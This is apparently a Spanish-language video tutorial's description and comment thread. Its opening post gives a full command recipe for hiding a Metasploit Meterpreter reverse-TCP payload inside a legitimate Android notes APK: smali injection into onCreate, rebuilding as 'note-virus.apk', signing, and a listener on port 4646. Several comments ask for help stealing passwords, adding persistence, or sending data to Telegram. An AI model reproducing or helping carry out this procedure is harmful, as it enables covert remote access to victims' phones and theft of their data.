Por aca le dejo escrito los comandos: ---------------------------------------------------------- - descargamos el apktool desde github: github.com/iBotPeaches/Apktool/releases/tag/v2.9.2 - para ejecutar es: java -jar la ruta del apktool.jar - ingresamos al smali de la apk maliciosa y lo descomprimimos dentro de la carpeta de la app que vamos a infectar usando tar tar -cf - ./smali | (cd ../notas; tar -xpf - ) - buscamos dentro de android manifest la ruta de MAIN grep -B2 "MAIN" AndroidManifest.xml - buscamos el archivo onCreate y le redirigimos a nuestro pyload dentro de metasploit le copiamos lo siguiente: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - ahora pasamos a revisar los permisos de la aplicacion infectada cat AndroidManifest.xml | grep "uses-permission - luego creamos el apk nuevamente java -jar ../../apktool_2.9.2.jar b notas -o note-virus.apk - si presenta error corremos lo siguiente java -jar ../../apktool_2.9.2.jar apktool empty-framework-dir --force - firmamos la apk keytool -genkey -v -keystore notes.keystore -alias notes -keyalg RSA -keysize 2048 -validity 10000 - luego usamos jarsigner si no esta instalados corremos el siguiente comando para instalar: apt-get install openjdk-11-jdk-headless luego ejecutamos los siguiente para ejecutar el firmado: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore notes.keystore note-virus.apk notes - levantamos metasploit msfdb run use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4646 exploit

necesitamos mas creadores de contenido asi, que enseñan la realidad para concientizar a los usuarios.

Este video demuestra que hay que pensar dos veces antes de descargarse una APK modificada! Muy buen video amigo!

Amigo. te pasaste. me diste ideas para proteger mi celular y a mi gente. Usen siempre las herramientas con hética muchachos.

¡¡Excelente video amigo!! Buena explicación

Usando todo esté conocimiento podríamos revisar apks y ver en su código si existen archivos maliciosos y así prevenirno y parchar la amenaza....

Cuando intento instalar la aplicacion modificada, me sale el mensaje de "La aplicacion no se ah instalado, porque parece que el paquete no es valido" Pero la original si que se instala

Esto se puede hacer desde un vps o maquina virtual para no exponernos tanto?. Solo debo descargar aplicaciones desde la PlayStore?

Deberías crear un curso completo de hacking android desde cero

Buen video, sigue asi. Sensei.

Muy bien vídeo, podrías hacer uno en dónde modifiques la APK pero en este caso para que un bot envíe información telegram.

Calcado el video de savitar jajajaa Buen video

Gracias capo segui asi

Buen video Bro, tengo una pregunta, cada vez que quiera acceder al dispositivo android desde metasploit, tengo que poner los datos del lport y todo eso de nuevo, y me saldrá el dispositivo que está infectado? O solo funciona una sola vez?

Esto es perfecto para infectar un despositivo y sacar sus claves

tengo un problema me sale este error al crear el meta [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload Error: One or more options failed to validate: LHOST.

dudas...en ngrok tiene que ser el puerto 4646? porque no me conecta ese puerto,lo tengo que abrir yo ewn el router?, si me aclaras eso mejor. Con otros puertos si va pero el 4646 no establece conexion

Bro tengo una pregunta, estoy intentando activar el puerto tcp con ngrok pero me dice que es de paga la función de iniciar túneles tcp. Que hago o que otra opción tengo? Deberías de actualizar este video porfavor respóndeme 🙏

Hola amogo quiero modificar una apk que quiero utilizar pero le pase por virus total y me sale que esta infectada y permisos fuera de lo que se necesita como lo hago

holaaa, emm xd tengo un problema, es que cuando voy a instalar la app, me dice "la aplicación no fue instalada porque el paquete no parece ser valido", q hago ahí? xd...

Tengo un problema en el minuto 15 cuando tu vas a modificar el archivo android manifestó. Xml a mi no me aparece eso q tu ibas a modificar no me sale y no se q aser

Bro como ago persistencia de la aplicación para que no falle la conexión nuevamente o que la aplicación tenga que estar abierta para acceder otra vez

Bro es para Android y Apple

bro y para meter virus a una aplicacion exe?

Puedo preguntarte eres de Perú

Es necesario usar el ngrok?

En celular como se hace

Bro donde consigo una mentoria contigo ?

El apk que usaste no encontré

Mensajes liminales jajjaja al abrir la terminal

Tengo un problema crack me aparece esto que puede ser? java -jar apktool_2.9.2.jar b com.notas.controlador_2021-06-21.apk~/s/downloads fish: Job 1, 'java -jar apktool_2.9.2.jar b c…' terminated by signal SIGSYS (Bad system call)